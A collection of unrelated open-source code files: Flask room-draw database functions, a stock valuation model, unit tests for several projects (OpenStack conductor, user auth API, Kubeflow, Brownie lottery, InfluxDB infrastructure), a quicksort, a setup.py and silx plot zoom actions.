FROM members NATURAL JOIN members_extra NATURAL JOIN hassle_participants NATURAL JOIN membership_types ORDER BY member_type, graduation_year, name """) return flask.g.db.execute(query).fetchall() def get_available_participants(): """Gets all participants who have not yet picked a room.""" query = sqlalchemy.text(""" SELECT user_id, name FROM members NATURAL JOIN members_extra NATURAL JOIN hassle_participants WHERE user_id NOT IN ( SELECT user_id FROM hassle_events UNION SELECT roommate_id FROM hassle_roommates ) ORDER BY name """) return flask.g.db.execute(query).fetchall() def set_participants(participants): """Sets hassle participants.""" # Delete old participants. delete_query = sqlalchemy.text("DELETE FROM hassle_participants") flask.g.db.execute(delete_query) # Insert new participants. insert_query = sqlalchemy.text(""" INSERT INTO hassle_participants (user_id) VALUES (:p) """) for participant in participants: flask.g.db.execute(insert_query, p=participant) def get_all_rooms(): """Gets all rooms in the house.""" query = sqlalchemy.text(""" SELECT room_number, alley, room_number IN ( SELECT room_number FROM hassle_rooms ) AS participating FROM rooms ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_participating_rooms(): """Gets all rooms participating in the hassle.""" query = sqlalchemy.text(""" SELECT room_number, alley FROM hassle_rooms NATURAL JOIN rooms ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_available_rooms(): """Gets all rooms that have not been picked.""" query = sqlalchemy.text(""" SELECT room_number, alley FROM hassle_rooms NATURAL JOIN rooms WHERE room_number NOT IN ( SELECT room_number FROM hassle_events ) ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_rooms_remaining(): """ Gets the number of rooms remaining for each alley. Returns a dict mapping alley to number of remaining rooms. """ alley_counts = dict(zip(alleys, [0] * len(alleys))) available_rooms = get_available_rooms() for room in available_rooms: alley_counts[room['alley']] += 1 return alley_counts def set_rooms(rooms): """Sets rooms available for hassle.""" # Delete old rooms. delete_query = sqlalchemy.text("DELETE FROM hassle_rooms") flask.g.db.execute(delete_query) # Insert rooms insert_query = sqlalchemy.text("INSERT INTO hassle_rooms (room_number) VALUES (:r)") for room in rooms: flask.g.db.execute(insert_query, r=room) def get_events(): """Returns events in the hassle.""" query = sqlalchemy.text(""" SELECT hassle_event_id, members.user_id, name, hassle_events.room_number, alley FROM hassle_events JOIN members ON hassle_events.user_id = members.user_id JOIN members_extra ON hassle_events.user_id = members_extra.user_id JOIN rooms ON hassle_events.room_number = rooms.room_number ORDER BY hassle_event_id """) return flask.g.db.execute(query).fetchall() def get_events_with_roommates(): """Returns events with additional roommate information.""" events = get_events() results = [] for event in events: row_dict = dict(event.items()) roommates = get_roommates(event['user_id']) row_dict['roommates'] = roommates occupant_names = [event['name']] for roommate in roommates: occupant_names.append(roommate['name']) row_dict['occupants'] = ', '.join(occupant_names) results.append(row_dict) return results def new_event(user_id, room_number, roommates): """Inserts a new event into the database.""" # Insert event. query = sqlalchemy.text(""" INSERT INTO hassle_events (user_id, room_number) VALUES (:u, :r) """) flask.g.db.execute(query, u=user_id, r=room_number) # Insert roommates. query = sqlalchemy.text(""" INSERT INTO hassle_roommates (user_id, roommate_id) VALUES (:u, :r) """) for roommate in roommates: flask.g.db.execute(query, u=user_id, r=roommate) def clear_events(event_id=None): """ Clears hassle events. If event_id is provided, all events after (not including) the provided event are cleared. Otherwise, everything is cleared. """ if event_id: query = sqlalchemy.text(""" DELETE FROM hassle_roommates WHERE user_id IN ( SELECT user_id FROM hassle_events WHERE hassle_event_id >= :e )""") flask.g.db.execute(query, e=event_id) query = sqlalchemy.text("DELETE FROM hassle_events WHERE hassle_event_id >= :e") flask.g.db.execute(query, e=event_id) else: flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_roommates")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_events")) def get_roommates(user_id): """Gets all roommates for the provided user.""" query = sqlalchemy.text(""" SELECT roommate_id, name FROM hassle_roommates JOIN members ON hassle_roommates.roommate_id = members.user_id JOIN members_extra ON members.user_id = members_extra.user_id WHERE hassle_roommates.user_id=:u ORDER BY name """) return flask.g.db.execute(query, u=user_id).fetchall() def clear_all(): """Clears all current hassle data.""" flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_roommates")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_events")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_participants")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_rooms"))
StarcoderdataPython
1706883
<gh_stars>0 """ code : 회사코드 name : 회사이름 liabilities_risk_ratio : 유동부채의 위험 배수 totalStockCount : 현재 총 주식수 df : 매년 회사 가치가 기록되는 DataFrame goal_rate_of_return : ?? 다시봐야할듯!! """ import FilePathManager as fm import pandas as pd from decimal import * import os import pickle class Model(object): def __init__(self, liabilities_risk_ratio = 1.2, goal_rate_of_return=0.06 ): self.liabilities_risk_ratio = liabilities_risk_ratio self.goal_rate_of_return = goal_rate_of_return """ 손익계산서에서 추출하는 데이터 리스트이다. 또한 각 항목이 여러 이름으로 불릴 수 있기 떄문에 계산될 수 있는 항목리스트를 가지고 있다. """ def getISDataColumns( self ): return { '영업이익' : { '영업이익(손실)' : 0 , '영업이익' : 0, '영업손실' : 0 } } """ 대조대차표에서 추출하는 데이터 리스트이다. 또한 각 항목이 여러 이름으로 불릴 수 있기 떄문에 계산될 수 있는 항목리스트를 가지고 있다. """ def getBSDataColumns( self): return { '유동자산' : { '유동자산' : 0 }, '투자자산' : { '장기매도가능금융자산' : 0 , '만기보유금융자산' : 0 , '상각후원가금융자산' : 0 , '기타포괄손익-공정가치금융자산' : 0 , '당기손익-공정가치금융자산' : 0 , '관계기업 및 공동기업 투자' : 0 , }, '유동부채' : { '유동부채' : 0 }, '비유동부채' : { '비유동부채' : 0 }, } def getDFindex( self ): return [ '유동자산', '투자자산', '유동부채', '비유동부채', '영업이익', '회사가치' ] """ 가장최근 분기부터 4년치의 가치를 분석 4년치의 가치 성장평균을 최근분기가치에 더해서 계산한다. 더할때 비율은 n개년/4 ---- 4개년보다 적을 경우 비율감소 미래가치와 현재가치의 평균을 최종가치로 평가한다. 미래, 현재, 평균의 각각 수익률을 계산한다. """ def calculateCompanyValue( self, df, company ): for column in df.columns: data = df.loc[ : , column] value = data['유동자산'] + data['투자자산'] - data['유동부채']*Decimal(self.liabilities_risk_ratio) - data['비유동부채'] if data['영업이익'] > 0 : value += data['영업이익']*Decimal(0.6)/Decimal(self.goal_rate_of_return) df.loc['회사가치' , [column]] = value # TODO- columns SORT self._info = {} for column in df.columns: self._info[column] = Decimal(df.loc[ '회사가치', column ]) valueDiffSum = Decimal(0) for index in range(1, min( 4, len(df.columns)-1 ) ): valueDiffSum += Decimal( df.loc[ '회사가치', df.columns[index] ] - df.loc[ '회사가치', df.columns[index-1] ] ) if valueDiffSum != 0 : valueDiffSum /= Decimal(3) self.currentValue = Decimal(df.loc[ '회사가치', df.columns[0] ]) self.feautureValue = self.currentValue + valueDiffSum self.avgValue = ( self.feautureValue + Decimal(df.loc[ '회사가치', df.columns[0] ]) ) / Decimal(2) self.currentReturnRatio = Decimal(100)*(( self.currentValue - company.recentTotalStockPrice ) / company.recentTotalStockPrice ) self.featureReturnRatio = Decimal(100)*(( self.feautureValue - company.recentTotalStockPrice ) / company.recentTotalStockPrice) self.avgReturnRatio = Decimal(100)*(( self.avgValue - company.recentTotalStockPrice ) / company.recentTotalStockPrice) self.vb_cur_sp = self.currentValue / company.totalStockCount self.vb_fea_sp = self.feautureValue / company.totalStockCount self.vb_avg_sp = self.avgValue / company.totalStockCount self.writeToInfo() return df def writeToInfo( self ): self._info['현재가치'] = self.currentValue self._info['미래가치'] = self.feautureValue self._info['평균가치'] = self.avgValue self._info['현재수익률'] = self.currentReturnRatio self._info['미래수익률'] = self.featureReturnRatio self._info['평균수익률'] = self.avgReturnRatio self._info['예상현재주가'] = self.vb_cur_sp self._info['예상미래주가'] = self.vb_fea_sp self._info['예상평균주가'] = self.vb_avg_sp def isValuableCompany( self ): return self.avgReturnRatio > Decimal(30) def to_Dict_info( self ): return self._info
StarcoderdataPython
1724525
# # ------------------------------------------------------------------------ # Copyright (c) 2018 Intel Corporation Intellectual Property # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------- # """Test classes for translator_svc""" import unittest import uuid import time import futurist from mock import patch from mock import PropertyMock from conductor.controller.translator_svc import TranslatorService from conductor.common.models import plan from conductor.common.music import api from conductor.common.music.model import base from oslo_config import cfg def plan_prepare(conf): music = api.API() music.keyspace_create(keyspace=conf.keyspace) plan_tmp = base.create_dynamic_model( keyspace=conf.keyspace, baseclass=plan.Plan, classname="Plan") return plan_tmp class TestTranslatorServiceNoException(unittest.TestCase): @patch('conductor.common.music.model.base.Base.table_create') @patch('conductor.common.music.model.base.Base.insert') @patch('conductor.controller.translator_svc.TranslatorService._reset_template_status') def setUp(self, mock_reset, mock_insert, mock_table_create): cfg.CONF.set_override('polling_interval', 1, 'controller') cfg.CONF.set_override('keyspace', 'conductor') cfg.CONF.set_override('timeout', 10, 'controller') cfg.CONF.set_override('limit', 1, 'controller') cfg.CONF.set_override('concurrent', True, 'controller') cfg.CONF.set_override('keyspace', 'conductor_rpc', 'messaging_server') self.conf = cfg.CONF self.Plan = plan_prepare(self.conf) kwargs = self.Plan name = str(uuid.uuid4()) timeout = self.conf.controller.timeout recommend_max = self.conf.controller.limit template = None status = self.Plan.TEMPLATE self.mock_plan = self.Plan(name, timeout, recommend_max, template, status=status) self.translator_svc = TranslatorService( worker_id=1, conf=self.conf, plan_class=kwargs) self.translator_svc.music.keyspace_create(keyspace=self.conf.keyspace) # TODO(ruoyu) @patch('conductor.controller.translator.Translator.ok') def translate_complete(self, mock_ok_func): with patch('conductor.controller.translator.Translator.ok', new_callable=PropertyMock) as mock_ok: mock_ok.return_value = True mock_ok_func.return_value = True self.translator_svc.translate(self.mock_plan) self.assertEquals(self.mock_plan.status, 'translated') @patch('conductor.controller.translator.Translator.translate') @patch('conductor.controller.translator.Translator.error_message') @patch('conductor.common.music.model.base.Base.update') def test_translate_error(self, mock_row_update, mock_error, mock_trns): with patch('conductor.controller.translator.Translator.ok', new_callable=PropertyMock) as mock_ok: mock_ok.return_value = False mock_error.return_value = 'error' self.translator_svc.translate(self.mock_plan) self.assertEquals(self.mock_plan.status, 'error') def test_millisec_to_sec(self): self.assertEquals(self.translator_svc.millisec_to_sec(1000), 1) def test_current_time_seconds(self): self.assertEquals(self.translator_svc.current_time_seconds(), int(round(time.time()))) @patch('conductor.common.music.model.base.Base.insert') @patch('conductor.common.music.model.search.Query.get_plan_by_col') @patch('conductor.common.music.model.base.Base.update') def test_reset_template_status(self, mock_call, mock_update, mock_insert): mock_plan = self.Plan(str(uuid.uuid4()), self.conf.controller.timeout, self.conf.controller.limit, None, status=self.Plan.TRANSLATING) mock_call.return_value = mock_plan self.translator_svc._reset_template_status() mock_update.assert_called_once() @patch('conductor.controller.translator_svc.TranslatorService._gracefully_stop') def test_terminate(self, mock_stop): self.translator_svc.terminate() mock_stop.assert_called_once() self.assertFalse(self.translator_svc.running) @patch('conductor.controller.translator_svc.TranslatorService._restart') def test_reload(self, mock_restart): self.translator_svc.reload() mock_restart.assert_called_once() def tearDown(self): patch.stopall() if __name__ == '__main__': unittest.main()
StarcoderdataPython
3274160
<reponame>ujwal475/Data-Structures-And-Algorithms from random import randint def quicksort(array): if len(array) < 2: return array low, same, high = [], [], [] pivot = array[randint(0, len(array) - 1)] for item in array: if item < pivot: low.append(item) elif item == pivot: same.append(item) elif item > pivot: high.append(item) return quicksort(low) + same + quicksort(high) arr = list(map(int,input().split())) print(quicksort(arr))
StarcoderdataPython
12327
"""Role testing files using testinfra""" def test_config_directory(host): """Check config directory""" f = host.file("/etc/influxdb") assert f.is_directory assert f.user == "influxdb" assert f.group == "root" assert f.mode == 0o775 def test_data_directory(host): """Check data directory""" d = host.file("/var/lib/influxdb") assert d.is_directory assert d.user == "influxdb" assert d.group == "root" assert d.mode == 0o700 def test_backup_directory(host): """Check backup directory""" b = host.file("/var/backups/influxdb") assert b.is_directory assert b.user == "influxdb" assert b.group == "root" assert b.mode == 0o775 def test_influxdb_service(host): """Check InfluxDB service""" s = host.service("influxdb") assert s.is_running assert s.is_enabled def test_influxdb_docker_container(host): """Check InfluxDB docker container""" d = host.docker("influxdb.service").inspect() assert d["HostConfig"]["Memory"] == 1073741824 assert d["Config"]["Image"] == "influxdb:latest" assert d["Config"]["Labels"]["maintainer"] == "<EMAIL>" assert "INFLUXD_REPORTING_DISABLED=true" in d["Config"]["Env"] assert "internal" in d["NetworkSettings"]["Networks"] assert \ "influxdb" in d["NetworkSettings"]["Networks"]["internal"]["Aliases"] def test_backup(host): """Check if the backup runs successfully""" cmd = host.run("/usr/local/bin/backup-influxdb.sh") assert cmd.succeeded def test_backup_cron_job(host): """Check backup cron job""" f = host.file("/var/spool/cron/crontabs/root") assert "/usr/local/bin/backup-influxdb.sh" in f.content_string def test_restore(host): """Check if the restore runs successfully""" cmd = host.run("/usr/local/bin/restore-influxdb.sh") assert cmd.succeeded
StarcoderdataPython
11208
#!/usr/bin/env python # -*- coding: utf-8 -*- import io import os import re from setuptools import setup, find_packages # classifiers = """\ # Development Status :: 4 - Beta # Programming Language :: Python # Programming Language :: Python :: 3 # Programming Language :: Python :: 3.4 # Programming Language :: Python :: 3.5 # Programming Language :: Python :: 3.6 # Programming Language :: Python :: 3.7 # Programming Language :: Python :: 3.8 # """ def _read(*parts, **kwargs): filepath = os.path.join(os.path.dirname(__file__), *parts) encoding = kwargs.pop('encoding', 'utf-8') with io.open(filepath, encoding=encoding) as fh: text = fh.read() return text def get_version(): version = re.search( r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', _read('bwtools', '__init__.py'), re.MULTILINE).group(1) return version def get_long_description(): return _read('README.md') def get_requirements(path): content = _read(path) return [ req for req in content.split("\n") if req != '' and not req.startswith('#') ] install_requires = get_requirements('requirements.txt') packages = find_packages() setup( name='bwtools', author='<NAME>', author_email='<EMAIL>', version=get_version(), license='MIT', description='tools for bigwigs', long_description=get_long_description(), long_description_content_type='text/markdown', keywords=['genomics', 'bioinformatics', 'Hi-C', 'analysis', 'cooler'], url='https://github.com/gspracklin/bwtools', zip_safe=False, # classifiers=[s.strip() for s in classifiers.split('\n') if s], packages=packages, install_requires=install_requires, entry_points={ 'console_scripts': [ 'bwtools = bwtools.cli:cli', ] } )
StarcoderdataPython
3310559
from app.tests.v1 import utils test_utils = utils.Utils() def test_user_register(client): ''' Test user registration ''' response = client.post('api/v1/auth/user/register', json=test_utils.USER) json_data = response.get_json() assert response.status_code == 201 assert json_data['status'] == 201 assert isinstance(json_data['data'], list) assert json_data['data'][0]['message'] == 'User registered successfully' def test_user_register_without_email(client): ''' Test user registration without email ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': '', 'phone_number': test_utils.USER['phone_number'], 'is_admin': False, 'is_politician': test_utils.USER['is_politician'], 'password': test_utils.USER['password'], } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Please provide your email' def test_user_register_existing_email(client): ''' Test user registration with existing email ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': test_utils.USER['email'], 'phone_number': test_utils.USER['phone_number'], 'is_admin': False, 'is_politician': test_utils.USER['is_politician'], 'password': test_utils.USER['password'], } client.post('api/v1/auth/user/register', json=test_utils.USER) response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 409 assert json_data['status'] == 409 assert isinstance(json_data['error'], str) assert json_data['error'] == 'User already exists' def test_user_register_taken_othername(client): ''' Test user registration with taken othername ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': '<EMAIL>', 'phone_number': test_utils.USER['phone_number'], 'is_admin': False, 'is_politician': test_utils.USER['is_politician'], 'password': <PASSWORD>['password'], } client.post('api/v1/auth/user/register', json=test_utils.USER) response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 409 assert json_data['status'] == 409 assert isinstance(json_data['error'], str) assert json_data['error'] == 'The othername you chose is taken' def test_user_register_invalid_email(client): ''' Test user registration with invalid email ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': 'emailaddress', 'phone_number': test_utils.USER['phone_number'], 'is_admin': False, 'is_politician': test_utils.USER['is_politician'], 'password': <PASSWORD>['password'], } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'email is invalid' def test_user_register_invalid_number(client): ''' Test user registration with invalid number ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': test_utils.USER['email'], # phone number should be 12 digits 'phone_number': '234435', 'is_admin': False, 'is_politician': test_utils.USER['is_politician'], 'password': test_utils.USER['password'], } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'phone_number is invalid' def test_user_register_invalid_boolean_is_admin(client): ''' Test user registration with invalid type of is_admin ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': test_utils.USER['email'], 'phone_number': test_utils.USER['phone_number'], 'is_admin': 'False', 'is_politician': test_utils.USER['is_politician'], 'password': <PASSWORD>['password'], } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'is_admin needs to be boolean' def test_user_register_invalid_boolean_is_politician(client): ''' Test user registration with invalid type of is_politician ''' data = { 'firstname': test_utils.USER['firstname'], 'lastname': test_utils.USER['lastname'], 'othername': test_utils.USER['othername'], 'email': test_utils.USER['email'], 'phone_number': test_utils.USER['phone_number'], 'is_admin': test_utils.USER['is_admin'], 'is_politician': 'False', 'password': test_utils.USER['password'], } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'is_politician needs to be boolean' def test_user_register_with_empty_payload(client): ''' Test user registration with empty payload ''' data = { } response = client.post('api/v1/auth/user/register', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) def test_user_register_with_no_payload(client): ''' Test user registration with no payload ''' response = client.post('api/v1/auth/user/register') json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) def test_admin_register(client): ''' Test admin registration ''' response = client.post('api/v1/auth/user/register', json=test_utils.ADMIN) json_data = response.get_json() assert response.status_code == 201 assert json_data['status'] == 201 assert isinstance(json_data['data'], list) assert json_data['data'][0]['message'] == 'User registered successfully' def test_politician_register(client): ''' Test politician registration ''' response = client.post('api/v1/auth/user/register', json=test_utils.POLITICIAN) json_data = response.get_json() assert response.status_code == 201 assert json_data['status'] == 201 assert isinstance(json_data['data'], list) assert json_data['data'][0]['message'] == 'User registered successfully' def test_user_login(client): ''' Test user login ''' test_utils.register_user(client, 'user') data = { 'email': test_utils.USER['email'], 'password': test_utils.USER['password'] } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 200 assert json_data['status'] == 200 assert isinstance(json_data['data'], list) assert json_data['data'][0]['message'] == 'Successfull log in' assert json_data['data'][0]['auth_token'] is not None def test_user_login_invalid_credentials(client): ''' Test user login with invalid credentials ''' test_utils.register_user(client, 'user') data = { 'email': test_utils.USER['email'], 'password': '<PASSWORD>' } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 401 assert json_data['status'] == 401 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Invalid credentials' def test_user_login_with_empty_data(client): ''' Test user login with empty data ''' test_utils.register_user(client, 'user') data = { } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Provide email and password as json.' def test_user_login_without_data(client): ''' Test user login without payload ''' test_utils.register_user(client, 'user') response = client.post('api/v1/auth/user/login') json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Provide email and password as json.' def test_user_login_without_email(client): ''' Test user login without email ''' test_utils.register_user(client, 'user') data = { 'email': '', 'password': test_utils.USER['password'] } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Please provide your email' def test_user_login_without_password(client): ''' Test user login without password ''' test_utils.register_user(client, 'user') data = { 'email': test_utils.USER['email'], 'password': '' } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'Please provide your password' def test_user_login_with_invalid_email(client): ''' Test user login with invalid email ''' test_utils.register_user(client, 'user') data = { 'email': ' erw ', 'password': test_utils.USER['password'] } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'email is invalid' def test_user_login_with_invalid_password(client): ''' Test user login with invalid password ''' test_utils.register_user(client, 'user') data = { 'email': test_utils.USER['email'], 'password': ' ' } response = client.post('api/v1/auth/user/login', json=data) json_data = response.get_json() assert response.status_code == 400 assert json_data['status'] == 400 assert isinstance(json_data['error'], str) assert json_data['error'] == 'password is invalid'
StarcoderdataPython
3308618
<filename>components/gcp/container/component_sdk/python/tests/google/ml_engine/test__create_model.py # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import mock import unittest from googleapiclient import errors from kfp_component.google.ml_engine import create_model CREATE_MODEL_MODULE = 'kfp_component.google.ml_engine._create_model' @mock.patch(CREATE_MODEL_MODULE + '.display.display') @mock.patch(CREATE_MODEL_MODULE + '.gcp_common.dump_file') @mock.patch(CREATE_MODEL_MODULE + '.KfpExecutionContext') @mock.patch(CREATE_MODEL_MODULE + '.MLEngineClient') class TestCreateModel(unittest.TestCase): def test_create_model_succeed(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.return_value = model result = create_model('mock_project', 'mock_model', model) self.assertEqual(model, result) def test_create_model_conflict_succeed(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.side_effect = errors.HttpError( resp = mock.Mock(status=409), content = b'conflict' ) mock_mlengine_client().get_model.return_value = model result = create_model('mock_project', 'mock_model', model) self.assertEqual(model, result) def test_create_model_conflict_fail(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.side_effect = errors.HttpError( resp = mock.Mock(status=409), content = b'conflict' ) changed_model = { 'name': 'mock_model', 'description': 'the changed mock model' } mock_mlengine_client().get_model.return_value = changed_model with self.assertRaises(errors.HttpError) as context: create_model('mock_project', 'mock_model', model) self.assertEqual(409, context.exception.resp.status) def test_create_model_use_context_id_as_name(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): context_id = 'context1' model = {} returned_model = { 'name': 'model_' + context_id } mock_mlengine_client().create_model.return_value = returned_model mock_kfp_context().__enter__().context_id.return_value = context_id create_model('mock_project', model=model) mock_mlengine_client().create_model.assert_called_with( project_id = 'mock_project', model = returned_model )
StarcoderdataPython
4819768
import pytest from brownie import exceptions from brownie.network.transaction import TransactionReceipt from scripts.deploy import deploy_lottery from scripts.useful.tools import get_account, wait_for_tx_confs from tests.tools import only_local, LotteryState def test_owner_can_start_lottery(): only_local() # Init owner = get_account(0) contract = deploy_lottery(account=owner) # Core / Assert # --- Check lottery is closed assert contract.m_LotteryState() == LotteryState.CLOSED.value # Open lottery tx = TransactionReceipt(contract.startLottery({"from": owner}).txid) if tx.confirmations == 0: tx.wait(1) # --- Check lottery is opened assert contract.m_LotteryState() == LotteryState.OPENED.value def test_unknown_cannot_start_lottery(): only_local() # Init owner = get_account(0) bad_actor = get_account(1) contract = deploy_lottery(account=owner) # Core / Assert # --- Check lottery is closed assert contract.m_LotteryState() == LotteryState.CLOSED.value # Expecting failure with pytest.raises(exceptions.VirtualMachineError): wait_for_tx_confs(contract.startLottery({"from": bad_actor}).txid) # --- Check lottery is still closed assert contract.m_LotteryState() == LotteryState.CLOSED.value def test_cannot_start_lottery_in_progress(): only_local() # Init owner = get_account() contract = deploy_lottery(account=owner) # Core # --- Start lottery once wait_for_tx_confs(contract.startLottery({"from": owner}).txid) # --- Start lottery twice : Should fail. with pytest.raises(exceptions.VirtualMachineError): wait_for_tx_confs(contract.startLottery({"from": owner}).txid)
StarcoderdataPython
1608287
<gh_stars>1-10 # coding: utf-8 # /*########################################################################## # # Copyright (c) 2004-2019 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ """ :mod:`silx.gui.plot.actions.control` provides a set of QAction relative to control of a :class:`.PlotWidget`. The following QAction are available: - :class:`ColormapAction` - :class:`CrosshairAction` - :class:`CurveStyleAction` - :class:`GridAction` - :class:`KeepAspectRatioAction` - :class:`PanWithArrowKeysAction` - :class:`ResetZoomAction` - :class:`ShowAxisAction` - :class:`XAxisLogarithmicAction` - :class:`XAxisAutoScaleAction` - :class:`YAxisInvertedAction` - :class:`YAxisLogarithmicAction` - :class:`YAxisAutoScaleAction` - :class:`ZoomBackAction` - :class:`ZoomInAction` - :class:`ZoomOutAction` """ from __future__ import division __authors__ = ["<NAME>", "<NAME>", "<NAME>"] __license__ = "MIT" __date__ = "24/04/2018" from . import PlotAction import logging from silx.gui.plot import items from silx.gui.plot._utils import applyZoomToPlot as _applyZoomToPlot from silx.gui import qt from silx.gui import icons _logger = logging.getLogger(__name__) class ResetZoomAction(PlotAction): """QAction controlling reset zoom on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ResetZoomAction, self).__init__( plot, icon='zoom-original', text='Reset Zoom', tooltip='Auto-scale the graph', triggered=self._actionTriggered, checkable=False, parent=parent) self._autoscaleChanged(True) plot.getXAxis().sigAutoScaleChanged.connect(self._autoscaleChanged) plot.getYAxis().sigAutoScaleChanged.connect(self._autoscaleChanged) def _autoscaleChanged(self, enabled): xAxis = self.plot.getXAxis() yAxis = self.plot.getYAxis() self.setEnabled(xAxis.isAutoScale() or yAxis.isAutoScale()) if xAxis.isAutoScale() and yAxis.isAutoScale(): tooltip = 'Auto-scale the graph' elif xAxis.isAutoScale(): # And not Y axis tooltip = 'Auto-scale the x-axis of the graph only' elif yAxis.isAutoScale(): # And not X axis tooltip = 'Auto-scale the y-axis of the graph only' else: # no axis in autoscale tooltip = 'Auto-scale the graph' self.setToolTip(tooltip) def _actionTriggered(self, checked=False): self.plot.resetZoom() class ZoomBackAction(PlotAction): """QAction performing a zoom-back in :class:`.PlotWidget` limits history. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomBackAction, self).__init__( plot, icon='zoom-back', text='Zoom Back', tooltip='Zoom back the plot', triggered=self._actionTriggered, checkable=False, parent=parent) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): self.plot.getLimitsHistory().pop() class ZoomInAction(PlotAction): """QAction performing a zoom-in on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomInAction, self).__init__( plot, icon='zoom-in', text='Zoom In', tooltip='Zoom in the plot', triggered=self._actionTriggered, checkable=False, parent=parent) 